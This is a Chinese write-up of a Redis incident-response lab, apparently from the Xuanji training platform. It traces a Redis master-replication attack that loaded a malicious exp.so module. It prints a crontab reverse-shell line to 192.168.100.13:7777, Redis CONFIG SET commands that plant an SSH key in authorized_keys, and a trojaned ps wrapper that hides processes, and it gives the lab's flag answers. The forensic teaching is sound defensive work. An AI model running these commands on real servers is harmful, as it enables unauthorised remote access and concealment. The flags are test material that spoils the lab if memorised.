惊落一身雪 发表于 2024-7-11 23:13:09

玄机——第二章日志分析-redis应急相应 wp

一、前言

标题链接:第二章日志分析-redis应急相应
三连私信免费送玄机注册邀请码私信!!!看见就回!!注意私信!!
首先简朴了解一下什么是redis?
Redis 是一个开源的、内存中的数据结构存储系统,用作数据库、缓存和消息代理。它支持多种数据结构,如字符串、散列、列表、聚集、有序聚集、位图、HyperLogLogs 和地理空间索引半径查询。以下是 Redis 的一些关键特性和用途:
关键特性:

[*] 高性能:

[*]由于 Redis 是内存数据库,数据存储和读取的速度非常快。每秒可以实行数百万次操纵。

[*] 多种数据结构:

[*]Redis 支持多种数据结构,使其非常灵活,能够顺应不同范例的应用场景。
[*]支持的结构包括:字符串(Strings)、列表(Lists)、聚集(Sets)、有序聚集(Sorted Sets)、哈希(Hashes)、位图(Bitmaps)等。

[*] 持久化:

[*]固然 Redis 是内存数据库,但它支持将数据持久化到磁盘上,以防数据丢失。
[*]两种持久化方式:RDB(快照)和 AOF(追加文件)。

[*] 复制(Replication):

[*]Redis 支持主从复制,可以将数据从一个 Redis 服务器复制到多个从服务器,提供数据冗余和高可用性。

[*] 高可用性:

[*]Redis 通过 Redis Sentinel 提供高可用性。Sentinel 监控 Redis 主从实例,并在主服务器不可用时自动进行故障转移。

[*] 集群(Cluster):

[*]Redis Cluster 提供自动分片和高可用性,答应 Redis 数据分布在多个节点上。

[*] 事务:

[*]支持事务,可以保证一组命令的原子性。

[*] 脚本:

[*]Redis 支持 Lua 脚本,使得可以在 Redis 服务器端实行复杂的逻辑。

基本的常见用途:

[*] 缓存:

[*]由于 Redis 的高性能,常被用作缓存来存储频繁访问的数据,减少数据库负载和提高应用相应速度。

[*] 会话存储:

[*]Redis 可以用来存储用户会话数据,如网站的用户登录会话等。

[*] 消息队列:

[*]Redis 支持发布/订阅、列表和有序聚集,因此可以用作简朴的消息队列系统。

[*] 实时分析:

[*]Redis 可以用于实时数据分析和统计,如计数器、唯一用户统计等。

[*] 排行榜/计分板:

[*]由于有序聚集的支持,Redis 非常适合实现排行榜和计分板功能。

[*] 地理空间数据:

[*]Redis 提供了内置的地理空间数据范例和命令,可以处置惩罚和查询地理位置数据。

Redis 的强大功能和灵活性使其在现代应用中得到了广泛的应用,包括交际网络、实时分析、缓存、会话管理和队列处置惩罚等范畴。
简朴了解一下攻击Redis的伎俩;


[*] 未授权访问:

[*]缺乏身份验证:默认环境下,Redis 不要求身份验证,攻击者可以直接毗连到 Redis 实例并实行任意命令。
[*]开放的网络接口:如果 Redis 监听在一个公共的 IP 地点上,攻击者可以通过网络远程访问 Redis 实例。

[*] 远程代码实行:

[*]CONFIG 命令:攻击者可以利用未授权访问,通过 CONFIG 命令修改设置,例如设置 dir 和 dbfilename 来写入恶意文件,从而在目的服务器上实行代码。
[*]模块加载:Redis 答应加载自界说模块,如果没有进行适当的访问控制,攻击者可以加载恶意模块并实行任意代码。

[*] 持久化攻击:

[*]持久化文件挟制:攻击者可以修改 Redis 的持久化设置(如 RDB 或 AOF 文件),然后写入恶意数据,当 Redis 重启时实行恶意操纵。
[*]恶意数据注入:通过注入恶意数据到持久化文件中,攻击者可以在数据恢复时触发恶意行为。

[*] 拒绝服务攻击(DoS):

[*]资源耗尽:通过发送大量请求或存储大量数据,攻击者可以耗尽 Redis 服务器的内存或 CPU 资源,导致服务不可用。
[*]大键值操纵:操纵超大键值(如大列表或聚集)大概会导致 Redis 性能降落,甚至崩溃。

[*] 数据篡改和泄露:

[*]数据偷取:未经授权的访问可以导致敏感数据的泄露。
[*]数据篡改:攻击者可以修改或删除关键数据,影响系统的正常运行。

二、概览

简介

服务器场景操纵系统 Linux
服务器账号暗码 root xjredis
任务环境说明
注:样本请勿在本地运行!!!样本请勿在本地运行!!!样本请勿在本地运行!!!
应急相应工程师小王某人收到安全设备告警服务器被植入恶意文件,请上机排查
三、参考文章

日志分析-redis应急相应
玄机-第二章 日志分析-redis应急相应
四、步调(解析)

准备工作#1.0

使用Xshell毗连;(新建毗连,这里不在强调)
https://img-blog.csdnimg.cn/direct/bbe3a65fafe04e9d88ba0d52a5a31a68.png#pic_center
使用Xftp毗连,并找到redis日志存放位置下载进行分析;
https://img-blog.csdnimg.cn/direct/9f716eb138a44d8da76589403e2f4d6d.png#pic_center
步调#1

通过本地 PC SSH到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交;

解题思路;
标题让我们通过本机使用SSH毗连靶机然后分析黑客IP,其实不必要这么麻烦(SSH毗连),我们直接分析redis的日志即可,当然前提条件是我们必须先知道“redis”版本号是多少,然后简朴了解一下黑客是利用什么毛病打进来的,如许更有助于了解后面的标题;
注意:如果已使用Xftp下载日志的师傅,推荐记事本更好分析一些(Xshell黑黑的看着着实难熬)
Redis 服务器日志存放位置;(一样平常不会轻易修改)
logfile /var/log/redis/redis.log
Redis 日志文件通常用于记录 Redis 服务器的运行环境、错误信息和其他紧张事件。这些日志文件默认存放在 /var/log/ 目次下,但实际位置可以通过 Redis 设置文件 redis.conf 中的 logfile 参数进行设置,但这题未修改。
Redis版本号查询命令;(也可以直接使用——redis-server --version)
redis-cli INFO | grep redis_version
接着查看 redis.conf 设置文件中注释部分,通常在文件顶部会包罗版本信息。
https://img-blog.csdnimg.cn/direct/e4f4d14c097d472ab1b5e26a0bc5b824.png#pic_center
得到;
   redis_version:5.0.1
Redis:5.0.1最大大概性毛病;
最大大概性毛病及其影响
对于 Redis 5.0.1,未授权访问 是最常见且大概性最大的毛病,尤其是在 Redis 默认设置下没有设置暗码的环境下。攻击者可以通过未授权访问实行以下操纵:

[*]读取和修改数据:攻击者可以读取 Redis 数据库中的所有数据,甚至可以删除或修改数据。
[*]远程代码实行:攻击者可以利用 CONFIG 命令修改设置文件来写入恶意代码,从而在目的服务器上实行任意代码。
[*]持久化恶意代码:通过修改 Redis 的持久化设置,攻击者可以在服务器重启时实行恶意操纵。
开始分析Redis日志;
同样日志内里也是能发现版本号;
https://img-blog.csdnimg.cn/direct/6cb55fbdd317430bb672ffd75c4214ee.png#pic_center
因为日志不是很多,算比较少的,往下翻一些就发现了“192.168.100.13”这个IP一直想与 Redis 实例尝试与主服务器(MASTER)进行同步(SYNC),但毗连被拒绝(Connection refused);
那就尝试提交一下,发现正确;(做了那么多找黑客ip的标题,如果IP不是很多且没有提交限制,为了更便捷,建议可以直接统计一下IP,一个一个尝试提交即可)
https://img-blog.csdnimg.cn/direct/95f974e1b25e4b318733615ee4ffb166.png#pic_center
得到,发现正确,但是。。。不是这题的,那没事我们继续往下翻翻看看日志;
flag{192.168.100.13}

那这里就简朴分析一下;
关键日志信息:


[*]MASTER <-> REPLICA sync started: 表现 Redis 副本(REPLICA)尝试与主服务器(MASTER)进行同步。
[*]Error condition on socket for SYNC: Connection refused: 表现同步毗连尝试失败,毗连被拒绝。
下面这里又发现了个IP:192.168.100.20,尝试提交,发现这才是第一题翻的flag,那这到底是怎么回事呢?我们来好好分析一下;
https://img-blog.csdnimg.cn/direct/f4831a26337341d7931d9ee81d780761.png
简朴分析;
从日志中,可以分析出黑客成功攻击的IP是192.168.100.20,以下是具体的分析过程:
日志分析
毗连失败:
419:S 31 Jul 2023 05:34:00.715 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:00.715 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:34:01.717 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:34:01.717 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:01.718 # Error condition on socket for SYNC: Connection refused
这里多次尝试毗连192.168.100.13:8888,但都被拒绝(Connection refused)。
切换主节点:
419:S 31 Jul 2023 05:34:03.034 * REPLICAOF 192.168.31.55:8888 enabled (user request from 'id=5 addr=192.168.200.2:64319 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=47 qbuf-free=32721 obl=0 oll=0 omem=0 events=r cmd=slaveof')

切换到另一个主节点192.168.31.55:8888。
再次切换主节点:
419:S 31 Jul 2023 05:34:33.173 * REPLICAOF 192.168.100.20:8888 enabled (user request from 'id=6 addr=192.168.200.2:64339 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=48 qbuf-free=32720 obl=0 oll=0 omem=0 events=r cmd=slaveof')
切换到192.168.100.20:8888。
成功毗连并同步:
419:S 31 Jul 2023 05:34:33.786 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:33.786 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:33.788 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:35.192 * Master replied to PING, replication can continue...
419:S 31 Jul 2023 05:34:35.194 * Trying a partial resynchronization (request 7a73a1a4297a16c50d8465b0cc432444f0e5df71:1).
419:S 31 Jul 2023 05:34:35.195 * Full resync from master: ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ:1
419:S 31 Jul 2023 05:34:35.195 * Discarding previously cached master state.
419:S 31 Jul 2023 05:34:35.195 * MASTER <-> REPLICA sync: receiving 48040 bytes from master
419:S 31 Jul 2023 05:34:35.197 * MASTER <-> REPLICA sync: Flushing old data
419:S 31 Jul 2023 05:34:35.197 * MASTER <-> REPLICA sync: Loading DB in memory
419:S 31 Jul 2023 05:34:35.197 # Wrong signature trying to load DB from file
419:S 31 Jul 2023 05:34:35.197 # Failed trying to load the MASTER synchronization DB from disk
从这部分日志中,可以看到与192.168.100.20成功建立毗连并进行同步。尽管尝试加载同步数据时出现错误,但毗连和同步过程已经开始,这意味着攻击者已经能够通过这种毗连尝试植入恶意代码或进一步操控系统。
加载恶意模块:
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so

末了,从日志中可以看到恶意模块exp.so被成功加载,这通常是黑客用来实行进一步攻击的本领。
总结
黑客通过多次尝试,终极成功将从节点设置为复制192.168.100.20:8888,并通过该毗连植入了恶意模块。这表明,IP地点192.168.100.20是黑客成功攻击的目的。
flag{192.168.100.20}
拓展1.1

当然以上是客观分析,最紧张的一点就是涉及到Redis的主从复制;
Redis的主从复制是用来实现数据冗余和提高可用性的一种机制。
1、从节点发送同步请求:从节点通过发送SYNC或PSYNC命令请求与主节点同步数据。
2、全量同步:如果从节点是初次同步或与主节点的复制偏移量不匹配,主节点会实行BGSAVE命令创建一个RDB文件,并将其发送给从节点。从节点吸收RDB文件并加载到内存中。
3、增量同步:在全量同步之后,主节点会将其缓冲区中的写命令持续发送给从节点,以保证数据一致性。
具体分析:
1、多次尝试毗连不同主节点:
419:S 31 Jul 2023 05:34:00.715 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:00.715 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:34:01.717 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:34:01.717 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:01.718 # Error condition on socket for SYNC: Connection refused
攻击者先是尝试毗连192.168.100.13:8888,但毗连被拒绝。
2、切换到另一个主节点:
419:S 31 Jul 2023 05:34:03.034 * REPLICAOF 192.168.31.55:8888 enabled (user request from 'id=5 addr=192.168.200.2:64319 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=47 qbuf-free=32721 obl=0 oll=0 omem=0 events=r cmd=slaveof')

攻击者通过REPLICAOF命令将从节点的主节点更改为192.168.31.55:8888。
3、终极毗连并同步成功:
419:S 31 Jul 2023 05:34:33.173 * REPLICAOF 192.168.100.20:8888 enabled (user request from 'id=6 addr=192.168.200.2:64339 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=48 qbuf-free=32720 obl=0 oll=0 omem=0 events=r cmd=slaveof')419:S 31 Jul 2023 05:34:33.786 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:33.786 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:33.788 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:35.192 * Master replied to PING, replication can continue...
419:S 31 Jul 2023 05:34:35.194 * Trying a partial resynchronization (request 7a73a1a4297a16c50d8465b0cc432444f0e5df71:1).
419:S 31 Jul 2023 05:34:35.195 * Full resync from master: ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ:1
419:S 31 Jul 2023 05:34:35.195 * Discarding previously cached master state.
419:S 31 Jul 2023 05:34:35.195 * MASTER <-> REPLICA sync: receiving 48040 bytes from master
419:S 31 Jul 2023 05:34:35.197 * MASTER <-> REPLICA sync: Flushing old data
419:S 31 Jul 2023 05:34:35.197 * MASTER <-> REPLICA sync: Loading DB in memory
419:S 31 Jul 2023 05:34:35.197 # Wrong signature trying to load DB from file
419:S 31 Jul 2023 05:34:35.197 # Failed trying to load the MASTER synchronization DB from disk
终极,攻击者将从节点的主节点设置为192.168.100.20:8888并成功建立毗连。固然在加载数据库时出现错误,但毗连和同步过程已经开始,这表明攻击者通过这种方式植入恶意代码或进一步操控系统。
4、加载恶意模块:
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so

攻击者成功加载了恶意模块exp.so,这通常是用来实行进一步攻击的本领。
总结
攻击者利用Redis的主从复制机制,通过多次尝试毗连不同的主节点,终极成功将从节点设置为复制192.168.100.20:8888,并通过该毗连植入了恶意模块。
步调#2

通过本地 PC SSH到服务器并且分析黑客第一次上传的恶意文件,将黑客上传的恶意文件内里的 FLAG 提交;

解题思路;
标题让我们找到黑客第一次上传的恶意文件,一样平常来说我们都会先去翻翻日志,看看有什么可疑的活动,接着筛选可疑命令,搜索如 CONFIG SET、SLAVEOF、MODULE LOAD 等命令,这些命令大概被黑客用来修改 Redis 的设置或者加载恶意模块。
   sudo grep ‘CONFIG SET’ /var/log/redis.log
sudo grep ‘SLAVEOF’ /var/log/redis.log
sudo grep ‘MODULE LOAD’ /var/log/redis.log
这边发现大写的“SLAVEOF”没查到,后来改成小写的就发现了可以活动;
https://img-blog.csdnimg.cn/direct/9f7509e663674345bc1a254a71a014ff.png#pic_center
简朴分析一下;
根据日志,攻击者在多次实行 SLAVEOF 命令后,通过修改 Redis 的主从复制设置,将受害者的 Redis 实例设置为从属服务器,从而将恶意数据或命令同步到目的服务器。
具体分析;

[*] 05:33:15 - REPLICAOF 192.168.100.13:8888:

[*]攻击者初次实行 SLAVEOF 命令,将 Redis 设置为从属服务器,指向 192.168.100.13:8888。
[*]攻击者大概尝试与其控制的服务器建立毗连,以同步数据。

[*] 05:34:03 - REPLICAOF 192.168.31.55:8888:

[*]第二次实行 SLAVEOF 命令,将从属服务器的地点更改为 192.168.31.55:8888。
[*]这大概是因为与 192.168.100.13:8888 的毗连失败,攻击者更换了控制服务器地点。

[*] 05:34:33 - REPLICAOF 192.168.100.20:8888:

[*]第三次实行 SLAVEOF 命令,将从属服务器的地点再次更改为 192.168.100.20:8888。
[*]这大概是攻击者的第三个尝试,试图找到一个能够成功毗连的控制服务器。

[*] 05:34:37 - MASTER MODE enabled:

[*]终极攻击者将 Redis 设置为主服务器模式,说明他们已经成功掌控了 Redis 实例。
[*]这一点通常是在成功与恶意服务器同步后,攻击者控制 Redis 实例所进行的操纵。

我们在分析 Redis 日志的过程中,尽管能够识别出攻击者的行为(如多次尝试使用 SLAVEOF 命令),我们仍必要找到黑客上传的具体恶意文件。通常,黑客上传的文件大概包括恶意的 Redis 模块、恶意脚本等,这些文件会在 Redis 的数据目次或临时目次中生成。
以是这里我们还必要进一步检查 Redis 日志中提到的模块;
grep "Module 'system' loaded from" /var/log/redis/redis.log
得到;
https://img-blog.csdnimg.cn/direct/fa8fd9a0e25d41529ad73d9758750a45.png#pic_center
   419:S 31 Jul 2023 05:34:37.205 * Module ‘system’ loaded from ./exp.so
通过我们已经下载好的日志(使用Xftp导出的日志),简朴前前后后分析一下;
https://img-blog.csdnimg.cn/direct/fa521eaff73145339bf2e769b18f846c.png#pic_center
关键点分析

[*] 多次的SLAVEOF 命令:

[*]攻击者首先将 Redis 设置为从属服务器指向 192.168.31.55:8888,然后又指向 192.168.100.20:8888。这大概是为了多次尝试毗连攻击者的控制服务器。

[*] 加载恶意模块:

[*]日志显示在 05:34:37.205 时加载了名为 system 的模块(从 ./exp.so 路径)。这很大概是一个恶意模块。

[*] 模块卸载:

[*]在 05:34:37.231 时,模块被卸载。这大概是攻击者在实行完恶意操纵后卸载模块以掩饰陈迹。

[*] 多次生存数据库:

[*]数据库在 05:42:00 和 05:42:42 时被生存到磁盘。这大概表明攻击者试图将恶意数据持久化。

那问题又来了为什么 SLAVEOF 算作恶意行为?


[*]利用毛病:通过 SLAVEOF 命令,攻击者可以让目的 Redis 实例毗连到他们控制的主服务器,从而将恶意数据同步到目的服务器上。
[*]模块加载:在同步过程中,攻击者可以利用模块加载功能,将恶意模块(如 exp.so)加载到目的服务器上,从而实行任意代码或篡改数据。
那我们该如何找到恶意文件?
根据日志分析,推测恶意文件大概是 exp.so 模块。可以通过以下步调找到并分析该文件:

[*] 查找模块文件:

[*]查看 Redis 目次中是否存在名为 exp.so 的文件:
sudo find / -name exp.so

https://img-blog.csdnimg.cn/direct/e845497e7a2e4b90a900851dae2158e1.png#pic_center
位置根目次下;
总结


[*]SLAVEOF 命令和 模块加载 是此次攻击的关键操纵。
[*]攻击者通过这些本领将 Redis 设置为从属服务器并加载恶意模块,从而实现恶意行为。
[*]找到并分析 exp.so 模块,以及检查持久化文件,可以资助确定攻击的具体内容和范围。
那就使用Xftp导出文件丢进010分析呗;(这里要在不放心是恶意文件,可以丢进在线的微步或者和河马、D盾都行)
微步在线
https://img-blog.csdnimg.cn/direct/93a838b6dcbb4979807076e1c915b04c.png#pic_center
导出,右键记事本打开(标题说将内里的flag进行提交,那我们直接定位查找一下关键字flag即可)
https://img-blog.csdnimg.cn/direct/d0f3b34ea5d840368bde561e1200d217.png#pic_center
尝试提交,发现正确;(藏的可真深啊!)
https://img-blog.csdnimg.cn/direct/dfa7a1e830c44b38a6b726f3a62219fd.png#pic_center
得到;
flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b}
尚有一种方法,也可以直接找到flag,是的没错直接过滤一下即可;
提取字符“flag”
strings exp.so | grep "flag"
前提是要能想到flag,一样平常来说照旧很难想到的,照旧建议大家诚实使用010,或者记事本如许更便于分析细节;
https://img-blog.csdnimg.cn/direct/2d111ea4d3be401aad79b9f995f337fb.png#pic_center
步调#3

通过本地 PC SSH到服务器并且分析黑客反弹 shell 的IP 为多少,将反弹 shell 的IP 作为 FLAG 提交;

解题思路;
   标题让我们找到黑客反弹shell的IP是啥作为flag进行提交,那我们可以查看一下当前用户的定时任务那一些,如果黑客通过定时任务(cron job)进行持久化攻击,他们大概会在 crontab 中留下定时实行的恶意脚本、命令或反弹 shell 的设置。因此,通过检查 crontab -l
,很大概会发现黑客设置的定时任务,从而找到恶意活动的迹象,那就试试呗。
那我们使用命令:
crontab -l
得到;
https://img-blog.csdnimg.cn/direct/9bd258b9b8c846afbec324d62555c67d.png#pic_center
那是什么意思呢?我们来简朴分析一下;
这行定时任务每分钟实行一次一个反弹 shell 命令,通过 /bin/sh 毗连到 IP 地点 192.168.100.13 的 7777 端口。这是一种典型的反弹 shell 技能,黑客利用它在目的系统上获得一个远程 shell。
具体来说就是:
这个定时任务每分钟实行一次,实行的命令是:
/bin/sh -i >& /dev/tcp/192.168.100.13/7777 0>&1
这个命令的作用是启动一个交互式 shell (/bin/sh -i) 并将其输入输出重定向到指定的 IP 地点和端口(192.168.100.13:7777)。具体来说:


[*]-i 选项表现启动一个交互式 shell。
[*]>& /dev/tcp/192.168.100.13/7777 使用 Bash 的网络重定向特性,将标准输出和标准错误重定向到 192.168.100.13 的 7777 端口。
[*]0>&1 表现将标准输入重定向到标准输出。
这种命令通常用于创建一个反向 shell,也称为反弹 shell。通过这种方式,黑客可以在目的主机上获得一个远程 shell 访问权限,并能够实行任意命令。
标题只让我们提交黑客的IP,而且前面日志内里也多次出现这个IP,以是这里就不言而喻了;
flag{192.168.100.13}

步调#4

通过本地 PC SSH到服务器并且溯源分析黑客的用户名,并且找到黑客使用的工具里的关键字符串(flag{黑客的用户-关键字符串} 注关键字符串 xxx-xxx-xxx)。将用户名和关键字符串作为 FLAG提交

解题思路;
   标题让我们溯源查找黑客的用户名,并且找到黑客使用工具的关键字符串,那这里我们检查 一下SSH 登录日志,通常 SSH 登录的日志记录在系统的安整日志文件中,但是,SSH(Secure Shell)提供了两种主要的登录验证方式;
1. 暗码验证(Password Authentication)
工作原理:


[*]用户在登录时必要提供用户名和暗码。
[*]服务器吸收用户名和暗码后,验证它们是否匹配预先存储的凭证。
[*]如果用户名和暗码正确,用户即可登录服务器。
2. 公钥验证(Public Key Authentication)
工作原理:


[*]用户生成一对 SSH 密钥对,包括私钥和公钥。
[*]公钥被上传并存储在目的服务器的用户账户下的 ~/.ssh/authorized_keys 文件中。
[*]用户在登录时使用其私钥进行身份验证。
[*]服务器通过匹配用户提供的私钥和存储的公钥来验证用户身份。
[*]如果匹配成功,用户即可登录服务器。
以是我们可以从两点看出;


[*]Redis 设置:黑客利用 Redis 的未授权访问或其他毛病,将自己的公钥写入了服务器的 ~/.ssh/authorized_keys 文件中,从而可以使用 SSH 公钥验证进行登录。
[*]登录日志:SSH 登录日志通常会显示使用的验证方式。固然在提供的日志中没有明确显示公钥验证,但联合 Redis 被利用的环境,可以推测黑客大概通过这种方式获取了访问权限。
也就是说会向靶机上写入SSH密钥,那我们查看一下靶机的/root/.ssh;
查看root是否有.ssh文件存在;
ls -la
得到;
https://img-blog.csdnimg.cn/direct/ecde7d85074f48f8ba4b82227fe1206a.png#pic_center
确实存在,那我们进入查看;
https://img-blog.csdnimg.cn/direct/7f9b0748a8a140fdb40165d877986270.png#pic_center
确实存在authorized_keys公钥,那就查看分析;
cat authorized_keys
得到;
https://img-blog.csdnimg.cn/direct/27209d134eca467287eac9bd6b5e3546.png#pic_center
简朴分析一下;
REDIS0009        redis-ver5.0.1
redis-bits????etOused-memXU
??preamble~??shB9

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDDh4OEFvyb4ubM7YPvzG/FfO6jE4PjLdmuCUdGP+aeLeJB5SXYT6zHkU9wlfY/Fo4UuBlhTqBaS6Ih/Wf62KepzrMsTQQYcSG/Xp8lgFzVCCFAk7apzxfRCPNk1pxaGiEF6MPoCmUu1UhC3ta3xyh2c4KZls0hyFN9JZsuD+siT8KVqm856vQ+RaTrZi3ThMa5gbeH+v3ZUcO35ZfMKor/uWXffHT0Yi06dsgIMN3faIiBrd1Lg0B5kOTaDq3fHs8Qs7pvR9C4ZTm2AK/Oct8ULdsnfS2YWtrYyC8rzNip9Wf083ZY1B4bj1UoxD+QwgThh5VP3xgRd9KDSzEYIBabstGh8GU5zDxr0zIuhQM35I0aALvojXl4QaaEnZwpqU3ZkojPG2aNC0QdiBK7eKwA38Gk+V8DEWc/TTkO+wm3aXYdll5sPmoWTAonaln1nmCiTDn4jKb73DxYHfSgNIDpJ6fS5kbWL5UJnElWCrxzaXKHUlqXJj3x81Oz6baFNv8= xj-test-user

[*] Redis 标识:
REDIS0009 redis-ver5.0.1
这一部分是 Redis 数据库文件的头部信息,表明这个文件是 Redis 数据库文件格式版本9,Redis 版本5.0.1。
[*] 公钥部分:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDDh4OEFvyb4ubM7YPvzG/FfO6jE4PjLdmuCUdGP+aeLeJB5SXYT6zHkU9wlfY/Fo4UuBlhTqBaS6Ih/Wf62KepzrMsTQQYcSG/Xp8lgFzVCCFAk7apzxfRCPNk1pxaGiEF6MPoCmUu1UhC3ta3xyh2c4KZls0hyFN9JZsuD+siT8KVqm856vQ+RaTrZi3ThMa5gbeH+v3ZUcO35ZfMKor/uWXffHT0Yi06dsgIMN3faIiBrd1Lg0B5kOTaDq3fHs8Qs7pvR9C4ZTm2AK/Oct8ULdsnfS2YWtrYyC8rzNip9Wf083ZY1B4bj1UoxD+QwgThh5VP3xgRd9KDSzEYIBabstGh8GU5zDxr0zIuhQM35I0aALvojXl4QaaEnZwpqU3ZkojPG2aNC0QdiBK7eKwA38Gk+V8DEWc/TTkO+wm3aXYdll5sPmoWTAonaln1nmCiTDn4jKb73DxYHfSgNIDpJ6fS5kbWL5UJnElWCrxzaXKHUlqXJj3x81Oz6baFNv8= xj-test-user
这一部分是一个标准的SSH公钥,格式为ssh-rsa,后面是公钥数据,末了是用户名注释xj-test-user。
直接百度一下这个用户,看看有什么线索;
https://img-blog.csdnimg.cn/direct/f2c10add7ba64a0f964339245c37c701.png#pic_center
第一个点进去查看一下;
https://img-blog.csdnimg.cn/direct/41845a2540ef4172b3bcbbc48a7f7c3c.png#pic_center
有三个,挨个进行分析;
https://img-blog.csdnimg.cn/direct/5b089085b4e647f0a76197094be3dfc1.png#pic_center
第一个就是,尝试提交,发现正确;(费了老半天劲终于让我找到了。。。)
https://img-blog.csdnimg.cn/direct/b38e310afbf6457198a6586479902faa.png#pic_center
按照提交格式来,flag{黑客的用户-关键字符串};
flag{xj-test-user-wow-you-find-flag}
拓展1.2

推测攻击步调

[*] 利用 Redis 写入:

[*]黑客利用 Redis 未授权访问或其他毛病,将上述内容写入 Redis 数据库,特殊是将公钥写入服务器的 ~/.ssh/authorized_keys 文件。
[*]这可以通过以下 Redis 命令实现:
[*]
CONFIG SET dir /root/.ssh/
CONFIG SET dbfilename "authorized_keys"
SAVE`
   

[*]通过上述命令,Redis 会在指定目次下创建或覆盖 authorized_keys 文件,将内容写入此中。

[*] 使用公钥登录:

[*]黑客使用对应的私钥,通过 SSH 公钥验证方式登录到目的服务器,绕过暗码验证。

从日志推断公钥验证
固然提供的日志中没有明确提到使用公钥验证,但联合 Redis 设置和攻击伎俩,可以推断以下过程:


[*]黑客通过 Redis 写入公钥。
[*]随后通过 SSH 使用公钥验证成功登录服务器。
结论
从提供的公钥内容可以推断,黑客利用 Redis 毛病或未授权访问,将自己的公钥写入目的服务器的 ~/.ssh/authorized_keys 文件,然后使用 SSH 公钥验证方式成功登录。这种方法避免了暗码验证的步调,更加隐蔽且难以检测。(没得说,确实牛)
步调#5

通过本地 PC SSH到服务器并且分析黑客篡改的命令,将黑客篡改的命令内里的关键字符串作为 FLAG 提交;

解题思路;
标题让我找出黑客篡改的命令,有很多也是要一个一个进行排查;


[*] 审查系统日志:

[*]查看系统的认证日志(如/var/log/auth.log或/var/log/secure),寻找异常的登录记录,特殊是来自非授权用户或IP的登录尝试。

[*] 审查命令历史:

[*]使用history命令查看近来实行的命令列表,检查是否有不正常的或未经授权的命令实行记录。

[*] 检查文件完备性:

[*]使用工具如Tripwire、AIDE等检查关键系统文件的完备性和一致性,寻找是否有被篡改的文件或目次。

[*] 分析系统文件的时间戳和哈希值:

[*]检查系统文件的修改时间戳和哈希值是否与预期的一致。异常的时间戳或哈希值大概表明文件已被篡改。

[*] 检查系统路径中的命令:

[*]检查系统中的关键命令(如/bin、/sbin、/usr/bin等目次下的命令),确保其内容和哈希值与预期一致。

[*] 扫描系统和历程:

[*]使用安全扫描工具(如rkhunter、chkrootkit等)扫描系统和历程,寻找已知的后门、木马或恶意程序。

[*] 分析网络流量和毗连:

[*]使用网络监控工具(如tcpdump、Wireshark等)分析服务器的网络流量和毗连,查看是否有与恶意活动相关的异常流量或毗连。

[*] 检查定时任务和启动项:

[*]检查定时任务(通过crontab -l
查看)和启动项(如/etc/init.d、/etc/systemd/system等),查找是否有恶意脚本或命令。

[*] 审查日志文件:

[*]检查应用程序的日志文件,特殊是涉及到系统命令实行或管理员操纵的日志,查找异常活动或错误信息。

[*] 使用安全工具和服务:

[*]借助安全信息与事件管理系统(SIEM)或安全运营中心(SOC)等工具,进行全面的安全事件分析和相应。

这一套下来不出意外的话,包查到,这里我就不多说了,直接说效果吧,前面几个都排查了,没什么问题,直到排查到“系统路径中的命令”时,发现了有一点特殊的地方;
https://img-blog.csdnimg.cn/direct/b8853ea5a77e4d348e9b1783d20fac79.png#pic_center
往下一点一点慢慢分析,发现ps有问题;
https://img-blog.csdnimg.cn/direct/306587be86d6468d954352d5b56b9ffc.png#pic_center
简朴分析一下为什么;
   从文件列表中可以看到,ps命令的权限为-rwxrwxrwx,这表现该命令具有读取、写入和实行权限,且对所有用户都是可读写可实行的。

[*] 异常的权限设置:

[*]正常环境下,系统命令像ps应该有限制的权限,通常为-rwxr-xr-x(所有者可读写实行,组和其他用户只可读和实行)。权限为-rwxrwxrwx大概表明被人为更改过。

跟进继续分析,再次确认;
cat ps
得到;
https://img-blog.csdnimg.cn/direct/dd27bf064c624900943eb1769b692da5.png#pic_center
简朴分析一下内容;
#/bin/bash
oldifs="$IFS"
IFS='\$n'
result=$(ps_ $1 $2 $3|grep -v 'threadd' )
for v in $result;
do
      echo -e "$v\t";
done
IFS="$oldifs"
#//c195i2923381905517d818e313792d196
简朴来说这段脚本是用来调用名为ps_的命令,并对其输出进行处置惩罚和过滤。

[*] 脚本解析:

[*]#!/bin/bash 表现这是一个 Bash 脚本,用来实行后续的命令。

[*] 变量设置:

[*]oldifs="$IFS":生存旧的字段分隔符(IFS)值。
[*]IFS='\$n':设置新的字段分隔符为\$n(这里大概是一个笔误,正常应该是换行符\n,但写法上看起来大概是在尝试界说一个特殊分隔符)。

[*] 命令实行和处置惩罚:

[*]result=$(ps_ $1 $2 $3|grep -v 'threadd' ):实行 ps_ 命令,并使用 grep 命令过滤掉包罗’threadd’的行,将效果存储在 result 变量中。
[*]for v in $result;:对 $result 中的每个变量 v 进行循环处置惩罚。
[*]echo -e "$v\t";:输出每个变量 v,并在末尾添加一个制表符。

